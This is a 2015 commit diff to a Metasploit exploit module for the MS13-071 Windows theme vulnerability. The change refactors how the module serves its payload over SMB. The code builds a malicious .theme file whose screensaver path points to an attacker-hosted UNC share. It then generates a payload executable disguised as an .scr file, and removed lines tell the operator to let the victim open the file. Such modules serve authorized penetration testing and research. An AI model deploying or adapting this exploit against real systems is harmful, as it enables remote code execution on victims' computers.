Modify SMB generation code to use primer based on rapid7#3074 changes to

Matthew Hall · Matthew Hall · commit e6ecdde45148 · 2015-02-20T11:35:22.000Z
implement Msf::Exploit::Remote::SMB::Server::Share as a mixin.
diff --git a/modules/exploits/windows/fileformat/ms13_071_theme.rb b/modules/exploits/windows/fileformat/ms13_071_theme.rb
@@ -10,7 +10,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::Exploit::FILEFORMAT
   include Msf::Exploit::EXE
-  include Msf::Exploit::Remote::SMBFileServer
+  include Msf::Exploit::Remote::SMB::Server::Share
 
   def initialize(info={})
     super(update_info(info,
@@ -57,34 +57,18 @@ def initialize(info={})
       'Privileged'     => false,
       'DisclosureDate' => "Sep 10 2013",
       'DefaultTarget'  => 0))
-
-      register_options(
+       register_options(
         [
-          OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
-          OptString.new('SHARE', [false, 'A static share path (ie. "share")']),
-          OptString.new('SCR', [false, 'A static SCR name (ie. "exploit.scr")'])
+         OptString.new('FILENAME', [true, 'The theme file', 'msf.theme']),
+         OptString.new('FILE_NAME', [ false, 'SCR File name to share', 'msf.scr'])
         ], self.class)
+       deregister_options('FILE_CONTENTS')
   end
 
   def exploit
-    print_status("Generating our malicious executable...")
-    exe = generate_payload_exe
-    my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
-
-    if not datastore['SHARE']
-      @scr_file = rand_text_alpha(7) + ".scr"
-    else
-      @scr_file = datastore['SCR']
-    end
-    if not datastore['SHARE']
-      @share = rand_text_alpha(5)
-    else
-      @share = datastore['SHARE']
-    end
-
-    @unc = "\\\\#{my_host}\\#{@share}\\#{@scr_file}"
-
     print_status("Creating '#{datastore['FILENAME']}' file ...")
+    self.exe_contents = generate_payload_exe
+    print_status("Malicious SCR available on #{unc}...")
     # Default Windows XP / 2003 theme modified
     theme = <<-EOF
 ; Copyright (c) Microsoft Corp. 1995-2001
@@ -123,14 +107,6 @@ def exploit
 MTSM=DABJDKT
     EOF
     file_create(theme)
-    print_good("Let your victim open #{datastore['FILENAME']}")
-
-    print_status("Starting SMB Server on: " + @unc)
-    start_smb_server(@unc, exe, @scr_file)
-    while true
-      break if session_created?
-      sleep(1)
-    end
   end
 
 end
